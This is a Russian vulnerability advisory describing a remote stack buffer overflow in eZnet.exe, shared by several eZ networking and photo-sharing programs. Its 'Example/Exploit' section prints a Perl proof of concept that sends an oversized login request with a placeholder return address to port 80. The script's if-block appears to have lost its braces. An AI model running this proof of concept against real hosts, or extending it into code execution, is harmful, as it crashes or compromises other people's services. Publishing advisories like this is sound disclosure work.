Удаленное выполнение произвольного кода в eZ 'eZnet.exe'

Дата публикации:
10.12.2003
Дата изменения:
17.10.2006
Всего просмотров:
1080
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: eZ 'eZnet.exe'

Описание: Уязвимость обнаружена в нескольких 'eZ' программах, включая eZphotoshare, eZmeeting, eZnetwork, и eZshare. Удаленный пользователь может выполнить произвольный код на целевой системе.

Удаленный пользователь может послать специально сформированный пакет к 80 TCP порту, чтобы врывать переполнение буфера в 'eZnet.exe'. Удаленный пользователь может аварийно завершить работу службы или выполнить произвольный код на целевой системе.

Пример/Эксплоит:

#!/usr/bin/perl -w
 
# Stack Overflow Vulnerability in eZphotoshare - PoC
#  - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[0]))
 
print "Usage: eZstack.pl <victim>\n\n";
exit;
 

print "Stack Overflow PoC\n";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>"80")
                           or die "Unable to connect to $ARGV[0] on port
80";

$eip = "\x58\x58\x58\x58";

$packet = "" .
  "GET /SwEzModule.dll?operation=login&autologin=" .
  "a"x4653 . $eip .
  "\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";

print $victim $packet;

print " + Making Request ...\n";

sleep(4);
close($victim);

print "Done.\n";
exit;

URL производителя:http://www.ezmeeting.com/Products.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: eZ Multiple Packages Stack Overflow Vulnerability

или введите имя

CAPTCHA